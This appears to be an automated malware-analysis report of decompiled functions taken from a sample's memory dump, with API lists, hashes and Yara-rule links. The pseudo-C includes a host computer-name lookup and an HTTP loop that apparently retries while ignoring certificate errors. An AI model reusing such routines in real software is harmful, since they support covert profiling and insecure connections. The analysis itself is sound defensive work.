                            0x00f14291
                            0x00f14293
                            0x00000000
                            0x00000000
                            0x00f14200
                            0x00f14200
                            0x00f14200
                            0x00f14207
                            0x00f1420d
                            0x00f14212
                            0x00f1421a
                            0x00f1421b
                            0x00f1421c
                            0x00f1421e
                            0x00f14222
                            0x00f14226
                            0x00000000
                            0x00f14228
                            0x00f1422c
                            0x00f14231
                            0x00f14248
                            0x00f1424a
                            0x00f14250
                            0x00f14255
                            0x00f14295
                            0x00f14295
                            0x00f142a2
                            0x00f142a6
                            0x00f142ab
                            0x00f142b1
                            0x00f142c0
                            0x00f142c2
                            0x00f142c8
                            0x00f142c8
                            0x00f142cb
                            0x00f142d1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f14255
                            0x00000000
                            0x00f14257
                            0x00f14257
                            0x00f14258
                            0x00000000
                            0x00f1425d
                            0x00f141fa
                            0x00f141f8
                            0x00f141ef
                            0x00f142d4
                            0x00f142d4
                            0x00f142da
                            0x00f142da
                            0x00f142e3

                            APIs
                            • IUnknown_QueryService.SHLWAPI(00000000,?,057F89D4,00F16FE2,?,?,?,?,?,?,?,?,?,?,?,00F16FE2), ref: 00F14242
                            • IUnknown_QueryService.SHLWAPI(00000000,?,057F89D4,00F16FE2,?,?,?,?,?,?,?,00F16FE2,00000000,00000000,00000000,?), ref: 00F14280
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: QueryServiceUnknown_
                            • String ID:
                            • API String ID: 2042360610-0
                            • Opcode ID: 889f898c44322d8a8851a53e3f5a9876963d5f3903505cf9df586fdced24dee6
                            • Instruction ID: f02a17e86ba07f11f971381789d49a473c79954ad889253a69e0a52494b17590
                            • Opcode Fuzzy Hash: 889f898c44322d8a8851a53e3f5a9876963d5f3903505cf9df586fdced24dee6
                            • Instruction Fuzzy Hash: 2E512E75900119AFDB04CFE8C888DEEB7B8FF88710B158598E915EB220D775A985DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F15A5E, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E00F15A5E(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00F16A4D(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xf1d2b8; // 0x48da5a8
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t68 + 0xf1e1fc, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00F14B0E(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                            0x00f15a64
                            0x00f15a67
                            0x00f15a77
                            0x00f15a80
                            0x00f15a84
                            0x00f15b52
                            0x00f15b58
                            0x00f15b58
                            0x00f15a9e
                            0x00f15aa3
                            0x00f15aa7
                            0x00f15aad
                            0x00f15ab2
                            0x00f15ab9
                            0x00f15ac8
                            0x00f15ac8
                            0x00f15acc
                            0x00f15ace
                            0x00f15ada
                            0x00f15af0
                            0x00f15af4
                            0x00f15afe
                            0x00f15b02
                            0x00f15b04
                            0x00f15b09
                            0x00f15b10
                            0x00f15b20
                            0x00f15b20
                            0x00f15b09
                            0x00f15b02
                            0x00f15b22
                            0x00f15b27
                            0x00f15b2c
                            0x00f15b2c
                            0x00f15b32
                            0x00f15b38
                            0x00f15b3d
                            0x00f15b3d
                            0x00f15b42
                            0x00f15b47
                            0x00f15b47
                            0x00f15b42
                            0x00f15acc
                            0x00f15b49
                            0x00f15b4f
                            0x00000000

                            APIs
                              • Part of subcall function 00F16A4D: SysAllocString.OLEAUT32(80000002), ref: 00F16AA4
                              • Part of subcall function 00F16A4D: SysFreeString.OLEAUT32(00000000), ref: 00F16B09
                            • SysFreeString.OLEAUT32(?), ref: 00F15B3D
                            • SysFreeString.OLEAUT32(00F14993), ref: 00F15B47
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: String$Free$Alloc
                            • String ID:
                            • API String ID: 986138563-0
                            • Opcode ID: ecdbbad3aef7f780d60d6113ba21933cefce9aee43c18d3881e59346e13887af
                            • Instruction ID: b0e575bdac3da83a7a338dc7fcaa684d6ef7ecf5cabceb597f91e535bf4b40f3
                            • Opcode Fuzzy Hash: ecdbbad3aef7f780d60d6113ba21933cefce9aee43c18d3881e59346e13887af
                            • Instruction Fuzzy Hash: 60314872900518EFCB21DF95CC88CEBBB79FFC9B507144658F8159B210D235AD91DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F15F72, Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                            Download Yara Rule
                            C-Code - Quality: 45%
                            			E00F15F72(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0xf1d2b8; // 0x48da5a8
				_push(_t42 + 0xf1e46c);
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0xf1d2b8; // 0x48da5a8
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t45 + 0xf1e48c,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0xf1d2b8; // 0x48da5a8
							_t30 = _v8;
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t48 + 0xf1e47c, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}


















                            0x00f15f7e
                            0x00f15f7f
                            0x00f15f8b
                            0x00f15f8c
                            0x00f15f8e
                            0x00f15f92
                            0x00f15f96
                            0x00f15f98
                            0x00f15fa1
                            0x00f15faf
                            0x00f15fb1
                            0x00f15fb5
                            0x00f15fb7
                            0x00f15fc4
                            0x00f15fc8
                            0x00f15fcd
                            0x00f15fd3
                            0x00f15fe0
                            0x00f15fe2
                            0x00f15fe4
                            0x00f15fea
                            0x00f15fea
                            0x00f15fed
                            0x00f15ff3
                            0x00f15ff3
                            0x00f15ff6
                            0x00f15ffc
                            0x00f15ffc
                            0x00f16003

                            APIs
                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,?,?), ref: 00F15FAF
                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,?,?), ref: 00F15FE0
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Interface_ProxyQueryUnknown_
                            • String ID:
                            • API String ID: 2522245112-0
                            • Opcode ID: 92a0fdcf71ea6e05e6d6ead6807e89a959610d7d86b2d3cc139125bad46b039e
                            • Instruction ID: a73142c4074ffafe23c7d063738fd2faa0f65c0740fa93259b6a609efddda7c1
                            • Opcode Fuzzy Hash: 92a0fdcf71ea6e05e6d6ead6807e89a959610d7d86b2d3cc139125bad46b039e
                            • Instruction Fuzzy Hash: C0214F75A00619EFCB04DBA4C888D9AF779EFC8704B148684FD15DB324D674ED45DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F1249A, Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                            Download Yara Rule
                            APIs
                            • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 00F124C2
                              • Part of subcall function 00F15A5E: SysFreeString.OLEAUT32(?), ref: 00F15B3D
                            • SafeArrayDestroy.OLEAUT32(?), ref: 00F1250F
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ArraySafe$CreateDestroyFreeString
                            • String ID:
                            • API String ID: 3098518882-0
                            • Opcode ID: df9cae534191d5394f24095055541d7d0b68843e913f763cd5eaaecdbc26c3f9
                            • Instruction ID: 8f08fbd436198ef1adb76cd4d4e3f0d1c95facf04c3a5a9566b79e1cfccdb551
                            • Opcode Fuzzy Hash: df9cae534191d5394f24095055541d7d0b68843e913f763cd5eaaecdbc26c3f9
                            • Instruction Fuzzy Hash: A1113C7290010EBFDB01DFA8CC45EEEBBB9AF08310F058065FA04E6161E3759A55EBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F1262B, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(00F1A6E1), ref: 00F12645
                              • Part of subcall function 00F15A5E: SysFreeString.OLEAUT32(?), ref: 00F15B3D
                            • SysFreeString.OLEAUT32(00000000), ref: 00F12685
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: String$Free$Alloc
                            • String ID:
                            • API String ID: 986138563-0
                            • Opcode ID: 16b03af98a962e7033cfd349769a9f2f2378f1b325cde35df0d9b94aef5813dc
                            • Instruction ID: 03cce507b32c4cd7d79103e16e688de603015c75fad185714f438189fcf1a382
                            • Opcode Fuzzy Hash: 16b03af98a962e7033cfd349769a9f2f2378f1b325cde35df0d9b94aef5813dc
                            • Instruction Fuzzy Hash: E0014B7291060EBFCB519FA9DC08DEBBBB9EF48350B014061FA05E6120D7749A15ABA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F140AC, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E00F140AC(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E00F155DC(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E00F16DFA(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                            0x00f140b1
                            0x00f140bc
                            0x00f140be
                            0x00f140c4
                            0x00f140c6
                            0x00f140cb
                            0x00f140d4
                            0x00f140d8
                            0x00f140e1
                            0x00f140e5
                            0x00f140f4
                            0x00f140e7
                            0x00f140e8
                            0x00f140ed
                            0x00f140ed
                            0x00f140e5
                            0x00f140d8
                            0x00f140fd

                            APIs
                            • GetComputerNameExA.KERNEL32(00000003,00000000,00F163F4,74ECC740,00000000,?,?,00F163F4), ref: 00F140C4
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • GetComputerNameExA.KERNEL32(00000003,00000000,00F163F4,00F163F5,?,?,00F163F4), ref: 00F140E1
                              • Part of subcall function 00F16DFA: RtlFreeHeap.NTDLL(00000000,00000000,00F155CD,00000000,?,?,00000000), ref: 00F16E06
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ComputerHeapName$AllocateFree
                            • String ID:
                            • API String ID: 187446995-0
                            • Opcode ID: d63781d7fb4b45471c682ce3e089367cadc81751f30ef77d9d8890e6a3db97e0
                            • Instruction ID: ef140cfe6737de479859aa59c89c50108db84b31915d1ab0f9592dee9e41071c
                            • Opcode Fuzzy Hash: d63781d7fb4b45471c682ce3e089367cadc81751f30ef77d9d8890e6a3db97e0
                            • Instruction Fuzzy Hash: 67F09027A04119ABEB10D6AA8C00EEF36ADDBC9750F250069BA14D3140EA70EF46A660
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F1230A, Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F1230A(signed int __edx, void* __edi, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t8;
				void* _t9;
				void* _t10;
				signed int _t11;

				_t11 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0xf1d270 = _t3;
				if(_t3 == 0) {
					_t9 = 8;
					return _t9;
				}
				 *0xf1d160 = GetTickCount();
				_t5 = E00F12CBF(_a4);
				if(_t5 == 0) {
					E00F12EBD(_t10, __edi, _a4); // executed
					if(E00F13AF1(_t10) != 0) {
						 *0xf1d298 = 1; // executed
					}
					_t8 = E00F1587D(_t11); // executed
					return _t8;
				}
				return _t5;
			}









                            0x00f1230a
                            0x00f12313
                            0x00f1231b
                            0x00f12320
                            0x00f12324
                            0x00000000
                            0x00f12324
                            0x00f12331
                            0x00f12336
                            0x00f1233d
                            0x00f12343
                            0x00f1234f
                            0x00f12351
                            0x00f12351
                            0x00f1235b
                            0x00000000
                            0x00f1235b
                            0x00f12360

                            APIs
                            • HeapCreate.KERNEL32(00000000,00400000,00000000,00F14154,?), ref: 00F12313
                            • GetTickCount.KERNEL32 ref: 00F12327
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CountCreateHeapTick
                            • String ID:
                            • API String ID: 2177101570-0
                            • Opcode ID: 89eb98a3a1603c565c3f693502000a319277fd6f15e512c3ecf8899172805aee
                            • Instruction ID: 64ca410397ce84673baa5bc9558aee0ab2ec9f05e1f71ea38a53a7ee591150de
                            • Opcode Fuzzy Hash: 89eb98a3a1603c565c3f693502000a319277fd6f15e512c3ecf8899172805aee
                            • Instruction Fuzzy Hash: DAE0D831684318EAE7A06FF09D077DD76B47F08B54F118418F559D11A0EBBDD4A0BB11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F18F5E, Relevance: 2.6, APIs: 2, Instructions: 52COMMON
                            Download Yara Rule
                            C-Code - Quality: 32%
                            			E00F18F5E(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x6ff6e700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}











                            0x00f18f65
                            0x00f18f72
                            0x00f18f74
                            0x00f18f77
                            0x00f18fbc
                            0x00f18fc4
                            0x00f18fca
                            0x00f18fce
                            0x00000000
                            0x00000000
                            0x00f18f7b
                            0x00f18f86
                            0x00f18f89
                            0x00f18fba
                            0x00000000
                            0x00000000
                            0x00f18f8b
                            0x00f18f8e
                            0x00f18f95
                            0x00f18f99
                            0x00f18fa2
                            0x00f18faa
                            0x00f18fd8
                            0x00f18fac
                            0x00f18fac
                            0x00000000
                            0x00f18fac
                            0x00f18faa
                            0x00f18f95
                            0x00f18fdb
                            0x00f18fe2
                            0x00f18fe2
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            • Opcode ID: a0ca517f84ad6a2970f9945daea0fb7e207cb44239eb05aa24ddf9305145d959
                            • Instruction ID: a3e28a86c51da8242e4b6ca31f63d7d192945b75b6cd6a189c1710fe6e6afe18
                            • Opcode Fuzzy Hash: a0ca517f84ad6a2970f9945daea0fb7e207cb44239eb05aa24ddf9305145d959
                            • Instruction Fuzzy Hash: 04012535D4010CFBDB109F95DD48ADFBFB9EB48750F108166E501D2150CB708A86EBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F178A8, Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 92%
                            			E00F178A8(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0xf1d270, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}














                            0x00f178ad
                            0x00f178b2
                            0x00f178c0
                            0x00f178c6
                            0x00f178ca
                            0x00f1793b
                            0x00f178cc
                            0x00f178d0
                            0x00f178d3
                            0x00f178d6
                            0x00f178dd
                            0x00f178de
                            0x00f178df
                            0x00f178e3
                            0x00f178e6
                            0x00f178ed
                            0x00f178f3
                            0x00f178f4
                            0x00f178f4
                            0x00f178fb
                            0x00f178fc
                            0x00f178fd
                            0x00f17901
                            0x00f1790d
                            0x00f17913
                            0x00f17914
                            0x00f17914
                            0x00f17916
                            0x00f1791c
                            0x00f1791e
                            0x00f17923
                            0x00f17924
                            0x00f17924
                            0x00f1792a
                            0x00f17933
                            0x00f17935
                            0x00f17938
                            0x00f17947

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00F178C0
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 36b7828edd275e209a0dcb3e0bb051e3fcc15c703ef8023cbdf393902911c289
                            • Instruction ID: 8db3a31f5e8cba0d1d5f33992a5df73415b9cd99615ce4af1c4040589fa264c9
                            • Opcode Fuzzy Hash: 36b7828edd275e209a0dcb3e0bb051e3fcc15c703ef8023cbdf393902911c289
                            • Instruction Fuzzy Hash: CE1129716893449FEB058F2DC851BE97BB5DB23368F24408EE4848F292C277894FC760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F13196, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                            Download Yara Rule
                            C-Code - Quality: 33%
                            			E00F13196(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xf1d2b8; // 0x48da5a8
				_t4 = _t15 + 0xf1e39c; // 0x57f8944
				_t20 = _t4;
				_t17 = E00F15A5E(_t4, _a4, 0x80000002, _a8, _t15 + 0xf1e124, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E00F16794(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                            0x00f131a0
                            0x00f131a2
                            0x00f131a9
                            0x00f131aa
                            0x00f131ab
                            0x00f131ac
                            0x00f131b2
                            0x00f131b7
                            0x00f131b7
                            0x00f131d3
                            0x00f131da
                            0x00f13209
                            0x00f131dc
                            0x00f131e1
                            0x00f13206
                            0x00f131e3
                            0x00f131e6
                            0x00f131ed
                            0x00f131f8
                            0x00f131ef
                            0x00f131f2
                            0x00f131f2
                            0x00f131fc
                            0x00f131fc
                            0x00f131e1
                            0x00f13210

                            APIs
                              • Part of subcall function 00F15A5E: SysFreeString.OLEAUT32(?), ref: 00F15B3D
                              • Part of subcall function 00F16794: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00F13D8B,?,00000000,?), ref: 00F1679D
                              • Part of subcall function 00F16794: memcpy.NTDLL(00000000,?,?,?,00000002,?,?,00F13D8B,?,00000000,?), ref: 00F167C7
                              • Part of subcall function 00F16794: memset.NTDLL ref: 00F167DB
                            • SysFreeString.OLEAUT32(00000000), ref: 00F131FC
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FreeString$lstrlenmemcpymemset
                            • String ID:
                            • API String ID: 397948122-0
                            • Opcode ID: 715675c1c4b14dce0418bb61645ea188b78a4faa9a6a7e7991ca81e1b14d6797
                            • Instruction ID: 76272d78f5de0a9bf9afc02f2ba3faa40a344413f97bc1413306465e52c3fbaa
                            • Opcode Fuzzy Hash: 715675c1c4b14dce0418bb61645ea188b78a4faa9a6a7e7991ca81e1b14d6797
                            • Instruction Fuzzy Hash: 98017132900019BFCB11AFA8CC05DEEBBB8FB04710F004555E911E6071D371AA99AB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F1447C, Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 88%
                            			E00F1447C(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E00F178A8(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0xf1d2b8; // 0x48da5a8
						_t20 = E00F1456E( *((intOrPtr*)(__esi + 4)),  *__esi, _t17 + 0xf1ea1c, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0xf1d270, 0, _a4); // executed
					}
				}
				return _t26;
			}








                            0x00f1447f
                            0x00f14485
                            0x00f144dc
                            0x00f1448b
                            0x00f14496
                            0x00f1449b
                            0x00f1449f
                            0x00f144ac
                            0x00f144c0
                            0x00f144c8
                            0x00f144d2
                            0x00f144d2
                            0x00f1449f
                            0x00f144e1

                            APIs
                              • Part of subcall function 00F178A8: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00F178C0
                              • Part of subcall function 00F1456E: lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 00F145A2
                              • Part of subcall function 00F1456E: StrStrA.SHLWAPI(00000000,?), ref: 00F145AF
                              • Part of subcall function 00F1456E: RtlAllocateHeap.NTDLL(00000000,?), ref: 00F145CE
                            • RtlFreeHeap.NTDLL(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00F12EB0), ref: 00F144D2
                            Memory Dump Source
